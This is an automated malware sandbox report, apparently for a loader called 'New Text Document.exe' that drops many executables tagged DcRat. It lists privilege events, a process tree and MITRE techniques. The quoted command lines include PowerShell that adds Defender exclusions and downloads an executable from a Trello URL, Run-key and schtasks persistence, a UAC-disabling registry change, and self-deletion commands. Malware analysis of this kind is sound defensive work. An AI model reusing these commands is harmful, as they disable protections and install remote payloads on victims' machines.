Token: SeDebugPrivilege	4920	Document.exe
Token: SeDebugPrivilege	2092	mstsc.exe
Token: SeBackupPrivilege	3408	Traffic.exe
Token: SeSecurityPrivilege	3408	Traffic.exe
Token: SeSecurityPrivilege	3408	Traffic.exe
Token: SeSecurityPrivilege	3408	Traffic.exe
Token: SeSecurityPrivilege	3408	Traffic.exe
Token: SeDebugPrivilege	5804	Jufrxnb.exe
Token: SeDebugPrivilege	5432	Jufrxnb.exe
Token: SeDebugPrivilege	5432	Jufrxnb.exe
Token: SeDebugPrivilege	5432	Jufrxnb.exe
Token: SeDebugPrivilege	2752	Jufrxnb.exe
Token: SeDebugPrivilege	5852	Jufrxnb.exe
Token: SeDebugPrivilege	2752	Jufrxnb.exe
Token: SeDebugPrivilege	5752	powershell.exe
Token: SeDebugPrivilege	5388	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	3760	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	4712	propro.exe
Token: SeDebugPrivilege	3244	Document.exe
Token: SeDebugPrivilege	1632	new1.exe
Token: SeDebugPrivilege	5856	powershell.exe
Token: SeDebugPrivilege	5500	svchost.exe
Token: SeDebugPrivilege	2832	RegAsm.exe
Token: SeDebugPrivilege	5660	msdtc.exe
Token: SeDebugPrivilege	5500	svchost.exe
Token: SeShutdownPrivilege	4416	powercfg.exe
Token: SeCreatePagefilePrivilege	4416	powercfg.exe
Token: SeShutdownPrivilege	5424	powercfg.exe
Token: SeCreatePagefilePrivilege	5424	powercfg.exe
Token: SeShutdownPrivilege	5392	powercfg.exe
Token: SeCreatePagefilePrivilege	5392	powercfg.exe
Token: SeShutdownPrivilege	6008	powercfg.exe
Token: SeCreatePagefilePrivilege	6008	powercfg.exe
Token: SeDebugPrivilege	384	RuntimeBroker2.exe
Token: SeDebugPrivilege	6112	agentDllDhcp.exe
Token: SeDebugPrivilege	3592	ghhjhjhsg.exe
Token: SeShutdownPrivilege	5616	powercfg.exe
Token: SeCreatePagefilePrivilege	5616	powercfg.exe
Token: SeShutdownPrivilege	1272	powercfg.exe
Token: SeCreatePagefilePrivilege	1272	powercfg.exe
Token: SeShutdownPrivilege	3872	powercfg.exe

Suspicious use of FindShellTrayWindow 42 IoCs

Processes:

wininit.exeexcel.exemedcallaboratory5.exeu2oo.1.exeu4j0.1.exeexplorer.exe

pid	process
2532	wininit.exe
2532	wininit.exe
3444	excel.exe
3444	excel.exe
4628	medcallaboratory5.exe
4628	medcallaboratory5.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe

Suspicious use of SendNotifyMessage 59 IoCs

Processes:

wininit.exeexcel.exemedcallaboratory5.exeu2oo.1.exeu4j0.1.exeexplorer.exe

pid	process
2532	wininit.exe
2532	wininit.exe
3444	excel.exe
3444	excel.exe
4628	medcallaboratory5.exe
4628	medcallaboratory5.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
1548	u2oo.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
6016	u4j0.1.exe
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
3268
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe
2792	explorer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

svchost.exesvchost.exe

pid process

5040 svchost.exe
5500 svchost.exe
3268

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document.execccc.execmd.exeISetup8.exewininit.exeexcel.exeBrawlB0t.exesvchost.exe

description	pid	process	target process
PID 3548 wrote to memory of 1584	3548	New Text Document.exe	klounada.exe
PID 3548 wrote to memory of 1584	3548	New Text Document.exe	klounada.exe
PID 3548 wrote to memory of 1584	3548	New Text Document.exe	klounada.exe
PID 3548 wrote to memory of 2532	3548	New Text Document.exe	wininit.exe
PID 3548 wrote to memory of 2532	3548	New Text Document.exe	wininit.exe
PID 3548 wrote to memory of 2532	3548	New Text Document.exe	wininit.exe
PID 3548 wrote to memory of 1524	3548	New Text Document.exe	cccc.exe
PID 3548 wrote to memory of 1524	3548	New Text Document.exe	cccc.exe
PID 3548 wrote to memory of 1524	3548	New Text Document.exe	cccc.exe
PID 3548 wrote to memory of 1560	3548	New Text Document.exe	crypted6077866846MVYQY.exe
PID 3548 wrote to memory of 1560	3548	New Text Document.exe	crypted6077866846MVYQY.exe
PID 3548 wrote to memory of 1560	3548	New Text Document.exe	crypted6077866846MVYQY.exe
PID 1524 wrote to memory of 2476	1524	cccc.exe	cmd.exe
PID 1524 wrote to memory of 2476	1524	cccc.exe	cmd.exe
PID 1524 wrote to memory of 2476	1524	cccc.exe	cmd.exe
PID 2476 wrote to memory of 3368	2476	cmd.exe	powershell.exe
PID 2476 wrote to memory of 3368	2476	cmd.exe	powershell.exe
PID 2476 wrote to memory of 3368	2476	cmd.exe	powershell.exe
PID 3548 wrote to memory of 3652	3548	New Text Document.exe	i1gcbW1E.exe
PID 3548 wrote to memory of 3652	3548	New Text Document.exe	i1gcbW1E.exe
PID 3548 wrote to memory of 4976	3548	New Text Document.exe	disable-defender.exe
PID 3548 wrote to memory of 4976	3548	New Text Document.exe	disable-defender.exe
PID 3548 wrote to memory of 4760	3548	New Text Document.exe	1234.exe
PID 3548 wrote to memory of 4760	3548	New Text Document.exe	1234.exe
PID 3548 wrote to memory of 4760	3548	New Text Document.exe	1234.exe
PID 3548 wrote to memory of 3480	3548	New Text Document.exe	ISetup8.exe
PID 3548 wrote to memory of 3480	3548	New Text Document.exe	ISetup8.exe
PID 3548 wrote to memory of 3480	3548	New Text Document.exe	ISetup8.exe
PID 3548 wrote to memory of 3380	3548	New Text Document.exe	test2.exe
PID 3548 wrote to memory of 3380	3548	New Text Document.exe	test2.exe
PID 3480 wrote to memory of 1472	3480	ISetup8.exe	u2oo.0.exe
PID 3480 wrote to memory of 1472	3480	ISetup8.exe	u2oo.0.exe
PID 3480 wrote to memory of 1472	3480	ISetup8.exe	u2oo.0.exe
PID 3548 wrote to memory of 1912	3548	New Text Document.exe	1111.exe
PID 3548 wrote to memory of 1912	3548	New Text Document.exe	1111.exe
PID 3548 wrote to memory of 1676	3548	New Text Document.exe	ISetup2.exe
PID 3548 wrote to memory of 1676	3548	New Text Document.exe	ISetup2.exe
PID 3548 wrote to memory of 1676	3548	New Text Document.exe	ISetup2.exe
PID 3548 wrote to memory of 1768	3548	New Text Document.exe	Tester.exe
PID 3548 wrote to memory of 1768	3548	New Text Document.exe	Tester.exe
PID 3548 wrote to memory of 5040	3548	New Text Document.exe	svchost.exe
PID 3548 wrote to memory of 5040	3548	New Text Document.exe	svchost.exe
PID 3480 wrote to memory of 1548	3480	ISetup8.exe	u2oo.1.exe
PID 3480 wrote to memory of 1548	3480	ISetup8.exe	u2oo.1.exe
PID 3480 wrote to memory of 1548	3480	ISetup8.exe	u2oo.1.exe
PID 2532 wrote to memory of 3444	2532	wininit.exe	excel.exe
PID 2532 wrote to memory of 3444	2532	wininit.exe	excel.exe
PID 2532 wrote to memory of 3444	2532	wininit.exe	excel.exe
PID 3548 wrote to memory of 2260	3548	New Text Document.exe	555.exe
PID 3548 wrote to memory of 2260	3548	New Text Document.exe	555.exe
PID 3444 wrote to memory of 4044	3444	excel.exe	svchost.exe
PID 3444 wrote to memory of 4044	3444	excel.exe	svchost.exe
PID 3444 wrote to memory of 4044	3444	excel.exe	svchost.exe
PID 3548 wrote to memory of 4920	3548	New Text Document.exe	Document.exe
PID 3548 wrote to memory of 4920	3548	New Text Document.exe	Document.exe
PID 3548 wrote to memory of 4920	3548	New Text Document.exe	Document.exe
PID 3444 wrote to memory of 4044	3444	excel.exe	svchost.exe
PID 3548 wrote to memory of 2876	3548	New Text Document.exe	BrawlB0t.exe
PID 3548 wrote to memory of 2876	3548	New Text Document.exe	BrawlB0t.exe
PID 2876 wrote to memory of 4272	2876	BrawlB0t.exe	powershell.exe
PID 2876 wrote to memory of 4272	2876	BrawlB0t.exe	powershell.exe
PID 5040 wrote to memory of 928	5040	svchost.exe	schtasks.exe
PID 5040 wrote to memory of 928	5040	svchost.exe	schtasks.exe
PID 3548 wrote to memory of 4628	3548	New Text Document.exe	medcallaboratory5.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

garits.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	garits.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

Processes:

RuntimeBroker2.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe

outlook_win_path 1 IoCs

Processes:

RuntimeBroker2.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RuntimeBroker2.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- DcRat
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548

C:\Users\Admin\AppData\Local\Temp\a\klounada.exe
"C:\Users\Admin\AppData\Local\Temp\a\klounada.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2532

C:\Users\Admin\AppData\Local\directory\excel.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
4⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\a\cccc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
3⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
5⤵
- DcRat
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" /t 1
5⤵
- Delays execution with timeout.exe
PID:5136

C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2' -Value '"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
PID:2192

C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
2⤵
- Executes dropped EXE
PID:3652

C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe
"C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Users\Admin\AppData\Local\Temp\a\1234.exe
"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
2⤵
- Executes dropped EXE
PID:4760

C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3480

C:\Users\Admin\AppData\Local\Temp\u2oo.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2oo.0.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1472

C:\Users\Admin\AppData\Local\Temp\u2oo.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2oo.1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1548

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Users\Admin\AppData\Local\Temp\a\test2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
2⤵
- Executes dropped EXE
PID:3380

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
- Executes dropped EXE
PID:1912

C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
2⤵
- Executes dropped EXE
PID:1676

C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- DcRat
- Creates scheduled task(s)
PID:928

C:\Users\Admin\AppData\Local\Temp\a\555.exe
"C:\Users\Admin\AppData\Local\Temp\a\555.exe"
2⤵
- Executes dropped EXE
PID:2260

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5D73.tmp"
3⤵
- DcRat
- Creates scheduled task(s)
PID:4192

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
- Executes dropped EXE
PID:788

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
4⤵
PID:3100

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
5⤵
- DcRat
- Creates scheduled task(s)
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD40A.tmp.bat""
4⤵
PID:1156

C:\Windows\SysWOW64\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:1124

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:5840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
6⤵
PID:3552

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5541.tmp"
6⤵
- DcRat
- Creates scheduled task(s)
PID:3020

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
- Executes dropped EXE
PID:3084

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
- Executes dropped EXE
PID:5756

C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe
"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
3⤵
- DcRat
- Creates scheduled task(s)
PID:2036

C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
2⤵
- Executes dropped EXE
PID:1772

C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies system certificate store
PID:2688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 796
3⤵
- Program crash
PID:4080

C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2336

C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:712

C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2108

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3408

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:3284

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
2⤵
- Executes dropped EXE
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 1100
3⤵
- Program crash
PID:908

C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
2⤵
- Executes dropped EXE
PID:4796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
3⤵
PID:5612

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
4⤵
- Runs ping.exe
PID:5408

C:\Users\Admin\AppData\Local\Temp\a\new1.exe
"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4104

C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
2⤵
- Executes dropped EXE
PID:4016

C:\Users\Admin\AppData\Local\Temp\u33k.0.exe
"C:\Users\Admin\AppData\Local\Temp\u33k.0.exe"
3⤵
- Executes dropped EXE
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 1100
4⤵
- Program crash
PID:2248

C:\Users\Admin\AppData\Local\Temp\u33k.1.exe
"C:\Users\Admin\AppData\Local\Temp\u33k.1.exe"
3⤵
- Executes dropped EXE
